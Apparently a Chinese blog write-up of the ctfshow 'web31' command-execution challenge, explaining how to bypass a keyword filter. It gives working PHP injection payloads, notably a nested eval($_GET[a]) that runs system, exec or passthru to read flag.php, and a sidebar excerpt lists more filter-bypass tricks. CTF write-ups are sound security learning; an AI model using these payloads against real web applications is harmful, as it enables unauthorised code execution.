命令执行web31

已于 2023-12-08 12:42:36 修改
阅读量349 收藏 5
点赞数 9
文章标签: android
于 2023-12-04 15:04:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DJmutu/article/details/134783850
版权

本题过滤了flag system php  cat sort shell . 空格  '

这一题过滤内容有增加了,部分函数还不要紧,主要是过滤了 . 空格 ` 这三种关键字,

所以我们这道题来学一种新的姿势---嵌套eval

嵌套eval可以取一个新的值来覆盖c的值,从而绕过滤内容,实操

解法1

?c=eval($_GET[a]);&a=system("tac flag.php");

让c取值,c取值a,$_GET可以让a取值来覆盖c的取值,用&来连接a的取值,在a中使用命令执行。

当然除了?c=eval($_GET[a]);&a=system("tac flag.php");

a中的命令其他的,例:

?c=eval($_GET[a]);&a=system("tac flag.php");

?c=eval($_GET[a]);&a=system("cat flag.php");     之后查看源代码

?c=eval($_GET[a]);&a=echo exec("tac flag.php");

?c=eval($_GET[a]);&a=passthru("tac flag.php");

还有很多其他的命令我就不一一列举了。

再来补充个解法

本题过滤了flag system php  cat sort shell . 空格  '

在过滤的符号中空格我们可以用%09来绕过

所以还可以用一下解法

解法2

解法3

解法4

然后查看源代码

以上的做法就没有用到eval嵌套。

当然我列出来的并不唯一,之前的有些命令也可以用%09来绕过空格。

以上就是在本题中学到的新姿势,每天学习,每天苕皮吃到饱!

DJmutu
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ctfshow Web入门 命令执行 Web31-74
qq_45427131的博客
10-21 2581
CtfShow Web入门-命令执行 感谢Y4师傅!看Y4的Wp真的学到好多! Web31 过滤条件: flag\system\php\cat\sort\shell\小数点\空格\单引号 执行passthru()查看flag 绕过cat使用tac more less head tac tail nl od(二进制查看) vi vim sort uniq 绕过空格用%09 <> ${IFS} $IFS$9 {cat,fl*} %20 flag绕过可以用通符代替 执行echo查看flag echo
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 855
ctfshow,命令执行web31
web安全-命令执行
qq_59350385的博客
02-23 3283
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
Web漏洞-命令执行和代码执行漏洞
Ays.Ie的博客
03-13 1807
该篇描述了web漏洞-命令执行和代码执行漏洞
Web页面执行shell命令
qq_43649264的博客
10-22 5740
本文以apache为web服务器为例 安装apache服务 yum -y install httpd 启动apache $ sudo systemctl restart httpd 创建shell脚本 $ cd /var/www/cgi-bin/ $ vim shell #!/bin/sh alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' echo -e "Content-type: text/pl
命令执行Web服务
10-20
命令执行Web服务】是指通过特定的命令来调用和执行Web服务的一种技术。Web服务是一种基于网络的、能够被不同应用系统之间互相调用的软件接口,它使用标准的XML(可扩展标记语言)来定义其接口和数据传输格式。这种...
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
web安全防护命令执行课件PPT
11-21
web安全防护命令执行课件PPT,命令执行命令注入的区别,命令注入的原理,命令注入的DWA实验操作。以及命令执行的总结。
Web开发常用的linux命令
07-06
- `sudo`: 以管理员权限执行命令。 - `systemctl`: 控制Systemd服务,例如启动、停止、重启。 4. 文件系统: - `/etc/fstab`: 配置文件系统挂载点。 - `df`: 查看磁盘空间使用情况。 - `du`: 查看文件或目录...
第一节 命令执行介绍-01
09-15
命令执行漏洞是一种常见的 Web 应用程序漏洞,指的是攻击者可以通过用户输入来执行恶意系统命令,导致服务器或系统敏感信息泄露、被植入木马、被控制等严重后果。下面是命令执行漏洞的相关知识点: 一、命令执行...
展开说说:Android之View基础知识解析
最新发布
Hidanchaofan的博客
07-13 638
View虽不属于Android四代组件,但应用程度却非常非常广泛。在Android客户端,君所见之处皆是View。我们看到的Button、ImageView、TextView等等可视化的控件都是View,ViewGroup是View的子类因此它也是View。但是现在我们把View和ViewGroup当成两个类来看待,ViewGroup可以容纳View和ViewGroup,但View不可以再容纳其他View或ViewGroup,这种容纳的关系可以一直延伸仿佛一棵大树,从内而外有了父子关系,因此有个概念叫做Vi
高通平台 android7.1 蓝牙的可见性设置
韩家老大的博客
07-10 336
Android7.1 高通 蓝牙 可见性
Android高级——Logger日志系统
松仔Log的博客
07-11 1115
1是因为标签和内容后面跟着’\0’,用来区分和解析。
Android11 窗口动画
littleyards的博客
07-09 886
首先创建LocalAnimationAdapter对象,LocalAnimationAdapter对象中的mSpec成员是WindowAnimationSpec对象,WindowAnimationSpec对象中的mAnimation成员是上一步创建的Animation 对象。首先创建leash图层,然后调用LocalAnimationAdapter的startAnimation继续处理,注意传入的mInnerAnimationFinishedCallback参数,后续动画完成后会回调里面的方法。
android13 rom frameworks 蓝牙自动接收文件
zhutoubenben的专栏
07-10 638
我们从导航栏这里,点开这个蓝牙的接收框,弹出来的对话框,使用android studio 的layout inspector可以发现这个是 Bluetooth里面的对话框进入蓝牙源码先大概的浏览下bluetooth里面的信息,看看有没有Notification之类的一般通知操作方法.setContentTitle("通知").setContentText("收到消息").addAction(R.drawable.icon, "按钮", snoozeIntent )
安卓热门面试题一
hai40587的博客
07-11 1028
Android 开发中一个非常强大的组件,用于显示大量数据集合的列表。为了优化自带了 ViewHolder 模式,这是优化列表显示的关键。通过重用视图(即 ViewHolder),避免了在滚动时不断创建和销毁视图的过程,从而提高了性能。确保你的 Adapter 正确地实现了 ViewHolder 模式。如果你的列表项需要从网络或数据库异步加载数据,请确保这些数据加载操作不会阻塞 UI 线程。可以使用 AsyncTask、Loader、Kotlin 协程或 LiveData 等方式来实现异步数据加载。
Android APT实战
我想月薪过万的博客
07-10 683
APT(Annotation Processing Tool)即注解处理器,在编译的时候可以处理注解然后搞一些事情,也可以在编译时生成一些文件之类的。ButterKnife和EventBus都使用了APT技术,如果不会APT技术就很难看懂这两个框架的源码。
android解锁remount
chenhao0568的专栏
07-11 222
写完号就自动上锁。
高通平台android的Framework开发遇到的一些问题总结
技术的积累,其实就是财富的积累呀。
07-11 362
每当Wifi连接后,系统会通过访问一个网站来确定网络的联通性。Google默认用的是https://www.google.com/generate_204 这个网站,在国外可以访问,国内不一定可以访问。1、Android设备,发现耳机插入了设备,但是设备statusbar并没有显示耳机插入的状态。2、连接Wifi,WiFi连接成功却显示感叹号或问号,不能使用。实际访问网络是可以的。3、如何添加GMS包。一般GMS包在partner_gms 文件夹下。涉及到framwork的修改一般都在QSSI文件夹下。
命令注入讲解ppt.pptx
08-10
2. **内部拼接命令**:开发者在编写代码时,可能将用户输入直接拼接到命令字符串中,如果没有正确地转义或过滤,恶意输入可能导致命令执行逻辑错误,从而触发漏洞。 防范命令注入攻击的方法主要包括: - **参数化...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值